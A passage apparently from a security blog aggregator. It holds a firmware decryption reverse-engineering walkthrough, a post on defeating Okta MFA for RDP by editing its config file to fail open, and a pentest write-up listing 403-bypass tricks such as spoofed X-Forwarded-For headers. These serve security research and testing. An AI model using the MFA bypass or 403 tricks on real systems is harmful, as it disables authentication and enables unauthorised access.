RES_UPDATE_INFO
 string and look for calls to 
FindResourceA
 with this string as an argument in the 
lpName
 position.

We find a match in a function which happens to find/load all of these custom resources under type 

23
.

We know where the data is loaded by the application, so now we need to see how it’s used. Doing static analysis from this point may be more work than it’s worth if the data isn’t operated on immediately. To speed things up I’m going to use a debugger’s assistance. I used WinDbg’s Time Travel Debugging to record an execution trace of the updater while it updates my radio. TTD is an invaluable tool and I’d highly recommend using it when possible. rr is an alternative for non-Windows platforms.

The decompiler output shows this function copies the 

RES_UPDATE_INFO
 resource to a dynamically allocated buffer. The 
qmemcpy()
 is inlined and represented by a 
rep movsd
 instruction in the disassembly, so we need to break at this instruction and examine the 
edi
 register’s (destination address) value. I set a breakpoint by typing 
bp 0x406968
 in the command window, allow the application to continue running, and when it breaks we can see the 
edi
 register value is 
0x2be5020
. We can now set a memory access breakpoint at this address using 
ba r4 0x2be5020
 to break whenever this data is read.

Our breakpoint is hit at 

0x4047DC
 — back to the disassembler. In IDA you can press 
G
 and enter this address to jump to it. We’re finally at what looks like the data processing function:

We broke when dereferencing 

v2
 and IDA has automatically named the variable it’s being assigned to as 
Time
. The 
Time
 variable is passed to another function which formats it as a string with 
%Y%m%d%H%M%S
. Let’s clean up the variables to reflect what we know:

bool __thiscall sub_4047B0(char *this)
{
  char *encrypted_data; // esi
  BOOL v3; // ebx
  char *v4; // eax
  char *time_string; // [esp+Ch] [ebp-320h] BYREF
  int v7; // [esp+10h] [ebp-31Ch] BYREF
  __time64_t Time; // [esp+14h] [ebp-318h] BYREF
  int (__thiscall **v9)(void *, char); // [esp+1Ch] [ebp-310h]
  int v10; // [esp+328h] [ebp-4h]

  // rename v2 to encrypted_data
  encrypted_data = *(char **)(*((_DWORD *)AfxGetModuleState() + 1) + 160);
  Time = *(int *)encrypted_data;
  // rename this function and its 2nd parameter
  format_timestamp(&Time, (int)&time_string, "%Y%m%d%H%M%S");
  v10 = 1;
  v7 = 0;
  v9 = off_4244A0;
  sub_4082C0(time_string);
  v3 = sub_408350(encrypted_data + 4, 0x100000, this + 92, 0x100000, &v7) == 0;
  v4 = time_string - 16;
  v9 = off_4244A0;
  v10 = -1;
  if ( _InterlockedDecrement((volatile signed __int32 *)time_string - 1) <= 0 )
    (*(void (__stdcall **)(char *))(**(_DWORD **)v4 + 4))(v4);
  return v3;
}

The timestamp string is passed to 

sub_4082c0
 on line 20 and the remainder of the update image is passed to 
sub_408350
 on line 21. I’m going to focus on 
sub_408350
 since I only care about the firmware data right now and based on how this function is called I’d wager its signature is something like:

status_t sub_408350(uint8_t *input, size_t input_len, uint8_t *output, output_len, size_t *out_data_processed);

Let’s see what it does:

int __stdcall sub_408350(char *a1, int a2, int a3, int a4, _DWORD *a5)
{
  int v5; // edx
  int v7; // ebp
  int v8; // esi
  unsigned int i; // ecx
  char v10; // al
  char *v11; // eax
  int v13; // [esp+10h] [ebp-54h]
  char v14[64]; // [esp+20h] [ebp-44h] BYREF

  v5 = a2;
  v7 = 0;
  memset(v14, 0, sizeof(v14));
  if ( a2 <= 0 )
  {
LABEL_13:
    *a5 = v7;
    return 0;
  }
  else
  {
    while ( 1 )
    {
      v8 = v5;
      if ( v5 >= 8 )
        v8 = 8;
      v13 = v5 - v8;
      for ( i = 0; i < 0x40; i += 8 )
      {
        v10 = *a1;
        v14[i] = (unsigned __int8)*a1 >> 7;
        v14[i + 1] = (v10 & 0x40) != 0;
        v14[i + 2] = (v10 & 0x20) != 0;
        v14[i + 3] = (v10 & 0x10) != 0;
        v14[i + 4] = (v10 & 8) != 0;
        v14[i + 5] = (v10 & 4) != 0;
        v14[i + 6] = (v10 & 2) != 0;
        v14[i + 7] = v10 & 1;
        ++a1;
      }
      sub_407980(v14, 0);
      if ( v8 )
        break;
LABEL_12:
      if ( v13 <= 0 )
        goto LABEL_13;
      v5 = v13;
    }
    v11 = &v14[1];
    while ( 1 )
    {
      --v8;
      if ( v7 >= a4 )
        return -101;
      *(_BYTE *)(a3 + v7++) = v11[6] | (2
                                      * (v11[5] | (2
                                                 * (v11[4] | (2
                                                            * (v11[3] | (2
                                                                       * (v11[2] | (2
                                                                                  * (v11[1] | (2
                                                                                             * (*v11 | (2 * *(v11 - 1))))))))))))));
      v11 += 8;
      if ( !v8 )
        goto LABEL_12;
    }
  }
}

I think we’ve found our function that starts decrypting the firmware! To confirm, we want to see what the 

output
 parameter’s data looks like before and after this function is called. I set a breakpoint in the debugger at the address where it’s called (
bp 0x404842
) and put the value of the 
edi
 register (
0x2d7507c
) in WinDbg’s memory window.

Here’s the data before:

After stepping over the function call:

We can dump this data to a file using the following command:

.writemem C:\users\lander\documents\maybe_deobfuscated.bin 0x2d7507c L100000

010 Editor has a built-in strings utility (Search > Find Strings…) and if we scroll down a bit in the results, we have real strings that appear in my radio!

At this point if we were just interested in getting the plaintext firmware we could stop messing with the binary and load the firmware into IDA Pro… but I want to know how this encryption works.

Encryption Details

Just to recap from the last section:

  • We’ve identified our data processing routine (let’s call this function 
    decrypt_update_info
    ).
  • We know that the first 4 bytes of the update data are a Unix timestamp that’s formatted as a string and used for an unknown purpose.
  • We know which function begins decrypting our firmware image.

Data Decryption

Let’s look at the firmware image decryption routine with some renamed variables:

int __thiscall decrypt_data(
        void *this,
        char *encrypted_data,
        int encrypted_data_len,
        char *output_data,
        int output_data_len,
        _DWORD *bytes_written)
{
  int data_len; // edx
  int output_index; // ebp
  int block_size; // esi
  unsigned int i; // ecx
  char encrypted_byte; // al
  char *idata; // eax
  int remaining_data; // [esp+10h] [ebp-54h]
  char inflated_data[64]; // [esp+20h] [ebp-44h] BYREF

  data_len = encrypted_data_len;
  output_index = 0;
  memset(inflated_data, 0, sizeof(inflated_data));
  if ( encrypted_data_len <= 0 )
  {
LABEL_13:
    *bytes_written = output_index;
    return 0;
  }
  else
  {
    while ( 1 )
    {
      block_size = data_len;
      if ( data_len >= 8 )
        block_size = 8;
      remaining_data = data_len - block_size;

      // inflate 1 byte of input data to 8 bytes of its bit representation
      for ( i = 0; i < 0x40; i += 8 )
      {
        encrypted_byte = *encrypted_data;
        inflated_data[i] = (unsigned __int8)*encrypted_data >> 7;
        inflated_data[i + 1] = (encrypted_byte & 0x40) != 0;
        inflated_data[i + 2] = (encrypted_byte & 0x20) != 0;
        inflated_data[i + 3] = (encrypted_byte & 0x10) != 0;
        inflated_data[i + 4] = (encrypted_byte & 8) != 0;
        inflated_data[i + 5] = (encrypted_byte & 4) != 0;
        inflated_data[i + 6] = (encrypted_byte & 2) != 0;
        inflated_data[i + 7] = encrypted_byte & 1;
        ++encrypted_data;
      }
      // do something with the inflated data
      sub_407980(this, inflated_data, 0);
      if ( block_size )
        break;
LABEL_12:
      if ( remaining_data <= 0 )
        goto LABEL_13;
      data_len = remaining_data;
    }
    // deflate the data back to bytes
    idata = &inflated_data[1];
    while ( 1 )
    {
      --block_size;
      if ( output_index >= output_data_len )
        return -101;
      output_data[output_index++] = idata[6] | (2
                                              * (idata[5] | (2
                                                           * (idata[4] | (2
                                                                        * (idata[3] | (2
                                                                                     * (idata[2] | (2
                                                                                                  * (idata[1] | (2 * (*idata | (2 * *(idata - 1))))))))))))));
      idata += 8;
      if ( !block_size )
        goto LABEL_12;
    }
  }
}

At a high level this routine:

  1. Allocates a 64-byte scratch buffer
  2. Checks if there’s any data to process. If not, set the output variable 
    out_data_processed
     to the number of bytes processed and return 0x0 (
    STATUS_SUCCESS
    )
  3. Loop over the input data in 8-byte chunks and inflate each byte to its bit representation.
  4. After the 8-byte chunk is inflated, call 
    sub_407980
     with the scratch buffer and 
    0
     as arguments.
  5. Loop over the scratch buffer and reassemble 8 sequential bits as 1 byte, then set the byte at the appropriate index in the output buffer.

Lots going on here, but let’s take a look at step #3. If we take the bytes 

0xAA
 and 
0x77
 which have bit representations of 
0b1010_1010
 and 
0b0111_1111
 respectively and inflate them to a 16-byte array using the algorithm above, we end up with:

| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 |    | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|----|---|---|---|---|---|---|---|---|
| 1 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |    | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 1 |

This routine does this process over 8 bytes at a time and completely fills the 64-byte scratch buffer with 1s and 0s just like the table above.

Now let’s look at step #4 and see what’s going on in 

sub_407980
:

_BYTE *__thiscall sub_407980(void *this, _BYTE *a2, int a3)
{
  // long list of stack vars removed for clarity

  v3 = (int)this;
  v4 = 15;
  v5 = a3;
  v32[0] = (int)this;
  v28 = 0;
  v31 = 15;
  do
  {
    for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
    {
      v7 = v28;
      if ( !v5 )
        v7 = v4;
      v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];
      v9 = v28;
      *(&v34 + i) = v8;
      if ( !v5 )
        v9 = v4;
      v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
      v11 = v28;
      *(&v35 + i) = v10;
      if ( !v5 )
        v11 = v4;
      v12 = *(_BYTE *)(i + 48 * v11 + v3 + 6) ^ a2[(unsigned __int8)byte_424E52[i] + 31];
      v13 = v28;
      *(&v36 + i) = v12;
      if ( !v5 )
        v13 = v4;
      v14 = *(_BYTE *)(i + 48 * v13 + v3 + 7) ^ a2[(unsigned __int8)byte_424E53[i] + 31];
      v15 = v28;
      v38[i - 1] = v14;
      if ( !v5 )
        v15 = v4;
      v16 = *(_BYTE *)(i + 48 * v15 + v3 + 8) ^ a2[(unsigned __int8)byte_424E54[i] + 31];
      v17 = v28;
      v38[i] = v16;
      if ( !v5 )
        v17 = v4;
      v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];
      i += 6;
    }
    v32[1] = *(int *)((char *)&dword_424E80
                    + (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
    v32[2] = *(int *)((char *)&dword_424F80
                    + (((unsigned __int8)v38[6] + 2) | (32 * (unsigned __int8)v38[2] + 2) | (16
                                                                                           * (unsigned __int8)v38[7]
                                                                                           + 2) | (8
                                                                                                 * (unsigned __int8)v38[3]
                                                                                                 + 2) | (4 * (unsigned __int8)v38[4] + 2) | (2 * (unsigned __int8)v38[5] + 2)));
    v32[3] = *(int *)((char *)&dword_425080
                    + (((unsigned __int8)v38[12] + 2) | (32 * (unsigned __int8)v38[8] + 2) | (16
                                                                                            * (unsigned __int8)v38[13]
                                                                                            + 2) | (8 * (unsigned __int8)v38[9]
                                                                                                  + 2) | (4 * (unsigned __int8)v38[10] + 2) | (2 * (unsigned __int8)v38[11] + 2)));
    v32[4] = *(int *)((char *)&dword_425180
                    + (((unsigned __int8)v38[18] + 2) | (32 * (unsigned __int8)v38[14] + 2) | (16
                                                                                             * (unsigned __int8)v38[19]
                                                                                             + 2) | (8 * (unsigned __int8)v38[15] + 2) | (4 * (unsigned __int8)v38[16] + 2) | (2 * (unsigned __int8)v38[17] + 2)));
    v32[5] = *(int *)((char *)&dword_425280
                    + (((unsigned __int8)v38[24] + 2) | (32 * (unsigned __int8)v38[20] + 2) | (16
                                                                                             * (unsigned __int8)v38[25]
                                                                                             + 2) | (8 * (unsigned __int8)v38[21] + 2) | (4 * (unsigned __int8)v38[22] + 2) | (2 * (unsigned __int8)v38[23] + 2)));
    v32[6] = *(int *)((char *)&dword_425380
                    + (((unsigned __int8)v38[30] + 2) | (32 * (unsigned __int8)v38[26] + 2) | (16
                                                                                             * (unsigned __int8)v38[31]
                                                                                             + 2) | (8 * (unsigned __int8)v38[27] + 2) | (4 * (unsigned __int8)v38[28] + 2) | (2 * (unsigned __int8)v38[29] + 2)));
    v32[7] = *(int *)((char *)&dword_425480
                    + (((unsigned __int8)v38[36] + 2) | (32 * (unsigned __int8)v38[32] + 2) | (16
                                                                                             * (unsigned __int8)v38[37]
                                                                                             + 2) | (8 * (unsigned __int8)v38[33] + 2) | (4 * (unsigned __int8)v38[34] + 2) | (2 * (unsigned __int8)v38[35] + 2)));
    v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
    v20 = &unk_425680 - (_UNKNOWN *)a2;
    v33 = *(int *)((char *)&dword_425580
                 + (((unsigned __int8)v38[42] + 2) | (32 * (unsigned __int8)v38[38] + 2) | (16
                                                                                          * (unsigned __int8)v38[43]
                                                                                          + 2) | (8
                                                                                                * (unsigned __int8)v38[39]
                                                                                                + 2) | (4 * (unsigned __int8)v38[40] + 2) | (2 * (unsigned __int8)v38[41] + 2)));
    result = a2;
    if ( v4 <= 0 )
    {
      v30 = 8;
      do
      {
        *result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
        result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);
        result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);
        result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
        result += 4;
        --v30;
      }
      while ( v30 );
    }
    else
    {
      v29 = 8;
      do
      {
        v24 = result[32];
        v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
        result += 4;
        result[28] = v22;
        *(result - 4) = v24;
        v25 = result[29];
        result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
        *(result - 3) = v25;
        v26 = result[30];
        result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
        *(result - 2) = v26;
        v27 = result[31];
        result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
        *(result - 1) = v27;
        --v29;
      }
      while ( v29 );
    }
    v5 = a3;
    v3 = v32[0];
    v4 = v31 - 1;
    v23 = v31 - 1 <= -1;
    ++v28;
    --v31;
  }
  while ( !v23 );
  return result;
}

Oof. This is substantially more complicated but looks like the meat of the decryption algorithm. We’ll refer to this function, 

sub_407980
, as 
decrypt_data
 from here on out. We can see what may be an immediate roadblock: this function takes in a C++ 
this
 pointer (line 5) and performs bitwise operations on one of its members (line 18, 23, etc.). For now let’s call this class member 
key
 and come back to it later.

This function is the perfect example of decompilers emitting less than ideal code as a result of compiler optimizations/code reordering. For me, TTD was essential for following how data flows through this function. It took a few hours of banging my head against IDA and WinDbg to understand, but this function can be broken up into 3 high-level phases:

  1. Building a 48-byte buffer containing our key material XOR’d with data from a static table.
int v33;
  unsigned __int8 v34; // [esp+44h] [ebp-34h]
  unsigned __int8 v35; // [esp+45h] [ebp-33h]
  unsigned __int8 v36; // [esp+46h] [ebp-32h]
  unsigned __int8 v37; // [esp+47h] [ebp-31h]
  char v38[44]; // [esp+48h] [ebp-30h]

  v3 = (int)this;
  v4 = 15;
  v5 = a3;
  v32[0] = (int)this;
  v28 = 0;
  v31 = 15;
  do
  {
    // The end statement of this loop is strange -- it's writing a byte somewhere? come back
    // to this later
    for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
    {
    // v28 Starts at 0 but is incremented by 1 during each iteration of the outer `while` loop
      v7 = v28;
      // v5 is our last argument which was 0
      if ( !v5 )
        // overwrite v7 with v4, which begins at 15 but is decremented by 1 during each iteration
        // of the outer `while` loop
        v7 = v4;
      // left-hand side of the xor, *(_BYTE *)(i + 48 * v7 + v3 + 4)
      //     v3 in this context is our `this` pointer + 4, giving us *(_BYTE *)(i + (48 * v7) + this->maybe_key)
      //     so the left-hand side of the xor is likely indexing into our key material:
      //     this->maybe_key[i + 48 * loop_multiplier]
      //
      // right-hand side of the xor, a2[(unsigned __int8)byte_424E50[i] + 31]
      //     a2 is our input encrypted data, and byte_424E50 is some static data
      //
      // this full statement can be rewritten as:
      //     v8 = this->maybe_key[i + 48 * loop_multiplier] ^ encrypted_data[byte_424E50[i] + 31]
      v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];

      v9 = v28;

      // write the result of `key_data ^ input_data` to a scratch buffer (v34)
      // v34 looks to be declared as the wrong type. v33 is actually a 52-byte buffer
      *(&v34 + i) = v8;

      // repeat the above 5 more times
      if ( !v5 )
        v9 = v4;
      v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
      v11 = v28;
      *(&v35 + i) = v10;

      // snip

      // v18 gets written to the scratch buffer at the end of the loop...
      v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];

      // this was probably the *real* last statement of the for-loop
      // i.e. for (int i = 0; i < 48; i += 6)
      i += 6;
    }

Build a 32-byte buffer containing data from an 0x800-byte static table, with indexes into this table originating from indices built from the buffer in step #1. Combine this 32-byte buffer with the 48-byte buffer in step #1.

// dword_424E80 -- some static data
    // (unsigned __int8)v38[0] + 2) -- the original decompiler output has this wrong.
    //     v33 should be a 52-byte buffer which consumes v38, so v38 is actually data set up in
    //     the loop above.
    // (32 * v34 + 2) -- v34 should be some data from the above loop as well. This looks like
    //     a binary shift optimization
    // repeat with different multipliers...
    //
    // This can be simplified as:
    //     size_t index  = ((v34 << 5) + 2)
    //                     | ((v37[1] << 4) + 2)
    //                     | ((v35 << 3) + 2)
    //                     | ((v36 << 2) + 2)
    //                     | ((v37 << 1) + 2)
    //                     | v38[0]
    //     v32[1] = *(int*)(((char*)&dword_424e80)[index])
    v32[1] = *(int *)((char *)&dword_424E80
                    + (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
    // repeat 7 times. each time the reference to dword_424e80 is shifted forward by 0x100.
    // note: if you do the math, the next line uses dword_424e80[64]. We shift by 0x100 instead of
    // 64 because is misleading because dword_424e80 is declared as an int array -- not a char array.

Iterate over the next 8 bytes of the output buffer. For each byte index of the output buffer, index into yet another static 32-byte buffer and use that as the index into the table from step #2. XOR this value with the value at the current index of the output buffer.

// Not really sure why this calculation works like this. It ends up just being `unk_425681`'s address
// when it's used.
    v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
    v20 = &unk_425680 - (_UNKNOWN *)a2;

// v4 is a number that's decremented on every iteration -- possibly bytes remaining?
    if ( v4 <= 0 )
    {
        // Loop over 8 bytes
      v30 = 8;
      do
      {
        // Start XORing the output bytes with some of the data generated in step 2.
        //
        // Cheating here and doing the "draw the rest of the owl", but if you observe that
        // we use `unk_425680` (v20), `unk_425681` (v19), `unk_425682`, and byte_425683, the
        // the decompiler generated suboptimal code. We can simplify to be relative to just
        // `unk_425680`
        //
        // *result ^= step2_bytes[unk_425680[output_index] - 1]
        *result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);

        // result[1] ^= step2_bytes[unk_425680[output_index] + 1]
        result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);

        // result[2] ^= step2_bytes[unk_425680[output_index] + 2]
        result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);

        // result[3] ^= step2_bytes[unk_425680[output_index] + 3]
        result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
        // Move our our pointer to the output buffer forward by 4 bytes
        result += 4;
        --v30;
      }
      while ( v30 );
    }
    else
    {
        // loop over 8 bytes
      v29 = 8;
      do
      {
        // grab the byte at 0x20, we're swapping this later
        v24 = result[32];

        // v22 = *result ^ step2_bytes[unk_425680[output_index] - 1]
        v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);

        // I'm not sure why the output buffer pointer is incremented here, but
        // this really makes the code ugly
        result += 4;

        // Write the byte generated above to offset 0x1c
        result[28] = v22;
        // Write the byte at 0x20 to offset 0
        *(result - 4) = v24;

        // rinse, repeat with slightly different offsets each time...
        v25 = result[29];
        result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
        *(result - 3) = v25;
        v26 = result[30];
        result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
        *(result - 2) = v26;
        v27 = result[31];
        result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
        *(result - 1) = v27;
        --v29;
      }
      while ( v29 );
    }

The inner loop in the 

else
 branch above I think is kind of nasty, so here it is reimplemented in Rust:

for _ in 0..8 {
    // we swap the `first` index with the `second`
    for (first, second) in (0x1c..=0x1f).zip(0..4) {
        let original_byte_idx = first + output_offset + 4;

        let original_byte = outbuf[original_byte_idx];

        let constant = unk_425680[output_offset + second] as usize;

        let new_byte = outbuf[output_offset + second] ^ generated_bytes_from_step2[constant - 1];

        let new_idx = original_byte_idx;
        outbuf[new_idx] = new_byte;
        outbuf[output_offset + second] = original_byte;
    }

    output_offset += 4;
}

Key Setup

We now need to figure out how our key is set up for usage in the 

decrypt_data
 function above. My approach here is to set a breakpoint at the first instruction to use the key data in 
decrypt_data
, which happens to be 
xor bl, [ecx + esi + 4]
 at 
0x4079d3
. I know this is where we should break because in the decompiler output the left-hand side of the XOR operation, the key material, will be the second operand in the 
xor
 instruction. As a reminder, the decompiler shows the XOR as:

v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];

The breakpoint is hit and the address we’re loading from is 

0x19f5c4
. We can now lean on TTD to help us figure out where this data was last written. Set a 1-byte memory write breakpoint at this address using 
ba w1 0x19f5c4
 and press the 
Go Back
 button. If you’ve never used TTD before, this operates exactly as 
Go
 would except backwards in the program’s trace. In this case it will execute backward until either a breakpoint is hit, interrupt is generated, or we reach the start of the program.

Our memory write breakpoint gets triggered at 

0x4078fb
 — a function we haven’t seen before. The callstack shows that it’s called not terribly far from the 
decrypt_update_info
 routine!

  • set_key
     (we are here — function is originally called 
    sub_407850
    )
  • sub_4082c0
  • decrypt_update_info

What’s 

sub_4082c0
?

Not a lot to see here except the same function called 4 times, initially with the timestamp string as an argument in position 0, a 64-byte buffer, and bunch of function calls using the return value of the last as its input. The function our debugger just broke into takes only 1 argument, which is the 64-byte buffer used across all of these function calls. So what’s going on in 

sub_407e80
?

The bitwise operations that look supsiciously similar to the byte to bit inflation we saw above with the firmware data. After renaming things and performing some loop unrolling, things look like this:

// sub_407850
int inflate_timestamp(void *this, char *timestamp_str, char *output, uint8_t *key) {
    for (size_t output_idx = 0; output_idx < 8; output_idx++) {
        uint8_t ts_byte = *timestamp_str;
        if (ts_byte) {
            timestamp_str += 1;
        }

        for (int bit_idx = 0; bit_idx < 8; bit_idx++) {
            uint8_t bit_value = (ts_byte >> (7 - bit_idx)) & 1;
            output[(output_idx * 8) + bit_idx] ^= bit_value;
        }
    }

    set_key(this, key);
    decrypt_data(this, output, 1);

    return timestamp_str;
}

// sub_4082c0
int set_key_to_timestamp(void *this, char *timestamp_str) {
    uint8_t key_buf[64];
    memset(&key_buf, 0, sizeof(key_buf));

    char *str_ptr = inflate_timestamp(this, timestamp_str, &key_buf, &static_key_1);
    str_ptr = inflate_timestamp(this, str_ptr, &key_buf, &static_key_2);
    str_ptr = inflate_timestamp(this, str_ptr, &key_buf, &static_key_3);
    inflate_timestamp(this, str_ptr, &key_buf, &static_key_4);

    set_key(this, &key_buf);
}

The only mystery now is the 

set_key
 routine:

int __thiscall set_key(char *this, const void *a2)
{
  _DWORD *v2; // ebp
  char *v3; // edx
  char v4; // al
  char v5; // al
  char v6; // al
  char v7; // al
  int result; // eax
  char v10[56]; // [esp+Ch] [ebp-3Ch] BYREF

  qmemcpy(v10, a2, sizeof(v10));
  v2 = &unk_424DE0;
  v3 = this + 5;
  do
  {
    v4 = v10[0];
    qmemcpy(v10, &v10[1], 0x1Bu);
    v10[27] = v4;
    v5 = v10[28];
    qmemcpy(&v10[28], &v10[29], 0x1Bu);
    v10[55] = v5;
    if ( *v2 == 2 )
    {
      v6 = v10[0];
      qmemcpy(v10, &v10[1], 0x1Bu);
      v10[27] = v6;
      v7 = v10[28];
      qmemcpy(&v10[28], &v10[29], 0x1Bu);
      v10[55] = v7;
    }
    for ( result = 0; result < 48; result += 6 )
    {
      v3[result - 1] = v10[(unsigned __int8)byte_424E20[result] - 1];
      v3[result] = v10[(unsigned __int8)byte_424E21[result] - 1];
      v3[result + 1] = v10[(unsigned __int8)byte_424E22[result] - 1];
      v3[result + 2] = v10[(unsigned __int8)byte_424E23[result] - 1];
      v3[result + 3] = v10[(unsigned __int8)byte_424E24[result] - 1];
      v3[result + 4] = v10[(unsigned __int8)byte_424E25[result] - 1];
    }
    ++v2;
    v3 += 48;
  }
  while ( (int)v2 < (int)byte_424E20 );
  return result;
}

This function is a bit more straightforward to reimplement:

void set_key(void *this, uint8_t *key) {
    uint8_t scrambled_key[56];
    memcpy(&scrambled_key, key, sizeof(scrambled_key));

    for (size_t i = 0; i < 16; i++) {
        size_t swap_rounds = 1;
        if (((uint32_t*)GLOBAL_KEY_ROUNDS_CONFIG)[i] == 2) {
            swap_rounds = 2;
        }

        for (int i = 0; i < swap_rounds; i++) {
            uint8_t temp = scrambled_key[0];
            memcpy(&scrambled_key, &scrambled_key[1], 27);
            scrambled_key[27] = temp;

            temp = scrambled_key[28];
            memcpy(&scrambled_key[28], &scrambled_key[29], 27);
            scrambled_key[55] = temp;
        }

        for (size_t swap_idx = 0; swap_idx < 48; swap_idx++) {
            size_t scrambled_key_idx = GLOBAL_KEY_SWAP_TABLE[swap_idx] - 1;

            size_t persistent_key_idx = swap_idx + (i * 48);
            this->key[persistent_key_idx] = scrambled_key[scrambled_key_idx];
        }
    }
}

Putting Everything Together

  1. Update data is read from resources
  2. The first 4 bytes of the update data are a Unix timestamp
  3. The timestamp is formatted as a string, has each byte inflated to its bit representation, and decrypted using some static key material as the key. This is repeated 4 times with the output of the previous run used as an input to the next.
  4. The resulting data from step 3 is used as a key for decrypting data.
  5. The remainder of the firmware update image is inflated to its bit representation 8 bytes at a time and uses the dynamic key and 3 other unique static lookup tables to transform the inflated input data.
  6. The result from step 5 is deflated back into its byte representation.

My decryption utility which completely reimplements this magic in Rust can be found at https://github.com/landaire/porkchop.

Loading the Firmware in IDA Pro

IDA thankfully supports disassembling the Hitachi/Rensas H8SX architecture. If we load our firmware into IDA and select the «Hitachi H8SX advanced» processsor type, use the default options for the «Disassembly memory organization» dialog, then finally choose «H8S/2215R» in the «Choose the device name» dialog…:

We don’t have shit. I’m not an embedded systems expert, but my friend suggested that the first few DWORDs look like they may belong to a vector table. If we right-click address 0 and select «Double word 0x142A», we can click on the new variable 

unk_142A
 to go to its location. Press 
C
 at this location to define it as Code, then press 
P
 to create a function at this address:

We can now reverse engineer our firmware 🙂

Bypassing Okta MFA Credential Provider for Windows

Bypassing Okta MFA Credential Provider for Windows

Original text by n00py

I’ll state this upfront, so as not to confuse: This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.

Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop Protocol (RDP) clients. Using Okta MFA Credential Provider for Windows, RDP clients (Windows workstations and servers) are prompted for MFA when accessing supported domain joined Windows machines and servers.

– https://help.okta.com/en-us/Content/Topics/Security/proc-mfa-win-creds-rdp.htm

This is going to be very similar to my other post about Bypassing Duo Two-Factor Authentication. I’d recommend reading that first to provide context to this post.

Biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making it less likely of a configuration. It also does not have “RDP Only” as the default, making the console bypass also less likely to be successful.

With that said, if you do have administrator level shell access, it is quite simple to disable.

For Okta, the configuration file is not stored in the registry like Duo but in a configuration file located at:

 C:\Program Files\Okta\Okta Windows Credential Provider\config\rdp_app_config.json

There are two things you need to do:

  • Modify the InternetFailOpenOption value to true
  • Change the Url value to something that will not resolve.

After that, attempts to RDP will not prompt Okta MFA.

It is of course always possible to uninstall the software as an admin, but ideally we want to achieve our objective with the least intrusive means possible. These configuration files can easily be flipped back when you are done.

Unusual 403 Bypass to a full website takeover [External Pentest]

Unusual 403 Bypass to a full website takeover [External Pentest]

Original text by Viktor Mares

Today we’ll look at one of the external penetration tests that I carried out earlier this year. Due to the confidentiality agreement, we will use the usual domain of REDACTED.COM

So, to provide a bit of context to the test, it is completely black box with zero information being provided from the customer. The only thing we know is that we are allowed to test redacted.com and the subdomain my.redacted.com

I’ll skip through the whole passive information gathering process and will get straight to the point.

I start actively scanning and navigating through the website to discover potential entry points. There are no ports open other than 80 & 443.

So, I start directory bruteforcing with gobuster and straightaway, I see an admin panel that returns a 403 — Forbidden response.

gobuster

Seeing this, we navigate to the website to verify that it is indeed a 403 and to capture the request with Burp Suite for potential bypasses.

admin panel — 403

In my mind, I am thinking that it will be impossible to bypass this, because there is an ACL for internal IP addresses. Nevertheless, I tried the following to bypass the 403:

  • HTTP Methods fuzzing (GET, POST, TRACE, HEAD etc.)
  • HTTP Headers fuzzing (X-Originating-IP: 127.0.0.1, X-Forwarded-For: 127.0.0.1 etc.)
  • Path fuzzing/force browsing (https://redacted.com/admin/index.html, https://redacted.com/admin/./index.html and more)
  • Protocol version changing (From HTTP 1.2, downgrade to HTTP 1.1 etc.)
  • String terminators (%00, 0x00, //, ;, %, !, ?, [] etc.) — adding those to the end of the path and inside the path

